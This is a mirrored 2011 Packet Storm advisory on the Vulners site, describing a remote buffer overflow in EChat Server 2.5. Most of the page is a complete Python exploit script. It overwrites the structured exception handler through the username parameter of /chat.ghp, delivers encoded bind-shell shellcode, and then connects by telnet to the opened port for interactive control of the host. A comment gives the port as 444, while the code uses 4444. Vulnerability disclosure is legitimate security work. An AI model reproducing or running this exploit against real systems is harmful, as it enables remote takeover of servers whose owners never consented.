Lucene search
K

EChat Server 2.5 Buffer Overflow

🗓️ 13 Aug 2011 00:00:00Reported by Juan SaccoType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 18 Views

EChat Server 2.5 Remote Buffer Overflow Vulnerabilit

Code
`Information  
--------------------  
Name : EChat Server <= v2.5  
Software : E Chat Server  
Vendor Homepage : http://www.echatserver.com/  
Vulnerability Type : Remote Buffer Overflow Exploit  
Severity : High  
Researcher : Juan Sacco (Runlvl) <jsacco [at] insecurityresearch [dot] com>  
  
Description  
------------------  
  
EChat Server is prone to a remote buffer-overflow vulnerability  
because it fails to perform adequate boundary-checks on user-supplied  
data.  
Successfully exploiting this issue will allow an attacker to execute  
arbitrary code within the context of the affected application. Failed  
exploit attempts will result in a denial-of-service condition.  
  
  
Exploit example as follow  
-----------------------------  
  
#!/usr/bin/python  
# Easy Chat Server Server <= v2.5 Remote Buffer Overflow Exploit  
# Written by Juan Sacco (Runlvl)  
# Contact: [email protected]  
# Web site: http://www.insecurityresearch.com  
# Target tested: Windows XP SP3  
  
import string, sys  
import socket, httplib  
import telnetlib  
  
def howtousage():  
print "Sorry, required arguments: Host Port"  
sys.exit(-1)  
  
def run():  
try:  
# Basic structure: JUNK + NSEH + SEH + SHELLCODE  
Junk = '\x41' * 216 # 216 bytes of A  
nSEH = '\xEB\x06\x90\x90' # JMP 6 bytes short  
SEH = '\xE1\xB2\x01\x10' # 0x1001b2e1 pop edi; pop esi; ret  
  
# ShellCode Bind TCP PORT 444 Lenght 751 Encode : Alpha Upper  
ShellCode = (  
"\x89\xe1\xd9\xed\xd9\x71\xf4\x5f\x57\x59\x49\x49\x49\x49\x43"  
"\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56\x58\x34"  
"\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41"  
"\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58"  
"\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x5a\x48\x4b\x39\x43\x30"  
"\x45\x50\x45\x50\x43\x50\x4c\x49\x4b\x55\x50\x31\x4e\x32\x45"  
"\x34\x4c\x4b\x50\x52\x50\x30\x4c\x4b\x56\x32\x54\x4c\x4c\x4b"  
"\x50\x52\x52\x34\x4c\x4b\x54\x32\x47\x58\x54\x4f\x4e\x57\x51"  
"\x5a\x56\x46\x50\x31\x4b\x4f\x50\x31\x4f\x30\x4e\x4c\x47\x4c"  
"\x45\x31\x43\x4c\x43\x32\x56\x4c\x47\x50\x4f\x31\x58\x4f\x54"  
"\x4d\x45\x51\x58\x47\x5a\x42\x4c\x30\x51\x42\x56\x37\x4c\x4b"  
"\x56\x32\x52\x30\x4c\x4b\x50\x42\x47\x4c\x45\x51\x58\x50\x4c"  
"\x4b\x47\x30\x54\x38\x4d\x55\x49\x50\x52\x54\x51\x5a\x45\x51"  
"\x4e\x30\x56\x30\x4c\x4b\x50\x48\x54\x58\x4c\x4b\x56\x38\x51"  
"\x30\x45\x51\x58\x53\x5a\x43\x47\x4c\x51\x59\x4c\x4b\x56\x54"  
"\x4c\x4b\x45\x51\x49\x46\x50\x31\x4b\x4f\x50\x31\x49\x50\x4e"  
"\x4c\x49\x51\x58\x4f\x54\x4d\x45\x51\x58\x47\x56\x58\x4d\x30"  
"\x54\x35\x5a\x54\x54\x43\x43\x4d\x4b\x48\x47\x4b\x43\x4d\x47"  
"\x54\x52\x55\x4d\x32\x50\x58\x4c\x4b\x51\x48\x51\x34\x43\x31"  
"\x4e\x33\x43\x56\x4c\x4b\x54\x4c\x50\x4b\x4c\x4b\x56\x38\x45"  
"\x4c\x45\x51\x58\x53\x4c\x4b\x43\x34\x4c\x4b\x45\x51\x4e\x30"  
"\x4c\x49\x50\x44\x56\x44\x56\x44\x51\x4b\x51\x4b\x45\x31\x51"  
"\x49\x50\x5a\x50\x51\x4b\x4f\x4d\x30\x56\x38\x51\x4f\x50\x5a"  
"\x4c\x4b\x54\x52\x5a\x4b\x4b\x36\x51\x4d\x52\x48\x56\x53\x47"  
"\x42\x43\x30\x45\x50\x43\x58\x43\x47\x43\x43\x47\x42\x51\x4f"  
"\x56\x34\x52\x48\x50\x4c\x52\x57\x56\x46\x45\x57\x4b\x4f\x4e"  
"\x35\x4e\x58\x5a\x30\x45\x51\x43\x30\x45\x50\x51\x39\x4f\x34"  
"\x51\x44\x56\x30\x52\x48\x51\x39\x4d\x50\x52\x4b\x45\x50\x4b"  
"\x4f\x4e\x35\x56\x30\x56\x30\x50\x50\x50\x50\x47\x30\x50\x50"  
"\x47\x30\x50\x50\x52\x48\x5a\x4a\x54\x4f\x49\x4f\x4d\x30\x4b"  
"\x4f\x49\x45\x4d\x59\x58\x47\x50\x31\x49\x4b\x56\x33\x52\x48"  
"\x43\x32\x43\x30\x54\x51\x51\x4c\x4b\x39\x4d\x36\x43\x5a\x54"  
"\x50\x56\x36\x50\x57\x52\x48\x49\x52\x49\x4b\x56\x57\x43\x57"  
"\x4b\x4f\x58\x55\x50\x53\x56\x37\x52\x48\x4f\x47\x4b\x59\x50"  
"\x38\x4b\x4f\x4b\x4f\x49\x45\x51\x43\x51\x43\x51\x47\x43\x58"  
"\x43\x44\x5a\x4c\x47\x4b\x4b\x51\x4b\x4f\x49\x45\x51\x47\x4c"  
"\x49\x4f\x37\x52\x48\x52\x55\x52\x4e\x50\x4d\x45\x31\x4b\x4f"  
"\x4e\x35\x45\x38\x45\x33\x52\x4d\x45\x34\x45\x50\x4c\x49\x5a"  
"\x43\x51\x47\x51\x47\x51\x47\x50\x31\x5a\x56\x52\x4a\x45\x42"  
"\x51\x49\x56\x36\x4d\x32\x4b\x4d\x45\x36\x4f\x37\x51\x54\x51"  
"\x34\x47\x4c\x43\x31\x43\x31\x4c\x4d\x47\x34\x56\x44\x54\x50"  
"\x49\x56\x45\x50\x51\x54\x51\x44\x50\x50\x50\x56\x56\x36\x56"  
"\x36\x47\x36\x51\x46\x50\x4e\x51\x46\x50\x56\x56\x33\x51\x46"  
"\x43\x58\x52\x59\x58\x4c\x47\x4f\x4c\x46\x4b\x4f\x58\x55\x4c"  
"\x49\x4b\x50\x50\x4e\x51\x46\x47\x36\x4b\x4f\x56\x50\x45\x38"  
"\x54\x48\x4d\x57\x45\x4d\x43\x50\x4b\x4f\x49\x45\x4f\x4b\x4b"  
"\x4e\x54\x4e\x50\x32\x4b\x5a\x52\x48\x4e\x46\x4c\x55\x4f\x4d"  
"\x4d\x4d\x4b\x4f\x4e\x35\x47\x4c\x54\x46\x43\x4c\x45\x5a\x4b"  
"\x30\x4b\x4b\x4b\x50\x54\x35\x43\x35\x4f\x4b\x47\x37\x45\x43"  
"\x52\x52\x52\x4f\x43\x5a\x45\x50\x51\x43\x4b\x4f\x4e\x35\x41"  
"\x41")  
ShellCodePort = 4444  
CraftedBuffer = Junk + nSEH + SEH + ShellCode  
vulnerableURL = '/chat.ghp?username=' + CraftedBuffer +  
'&password=null&room=1&null=2'  
  
Connection = httplib.HTTPConnection(Host, Port)  
Connection.request('GET', vulnerableURL)  
Connection.close()  
  
print "Connecting to " + Host  
TelnetConnection = telnetlib.Telnet(Host, ShellCodePort)  
TelnetConnection.interact()  
  
except:  
print "Exploit connection closed"  
  
if __name__ == '__main__':  
print "Exploit EChat Server <= v2.5 Remote Buffer Overflow Exploit"  
print "Author: Juan Sacco (Runlvl)"  
  
try:  
Host = sys.argv[1]  
Port = sys.argv[2]  
except IndexError:  
howtousage()  
run()  
  
  
Author  
-------------------  
Juan Sacco (Runlvl) - http://www.insecurityresearch.com  
  
--   
_________________________________________________  
Insecurity Research - Security auditing and testing software  
Web: http://www.insecurityresearch.com  
Insect Pro 2.6.1 was released stay tunned  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

13 Aug 2011 00:00Current
0.5Low risk
Vulners AI Score0.5
18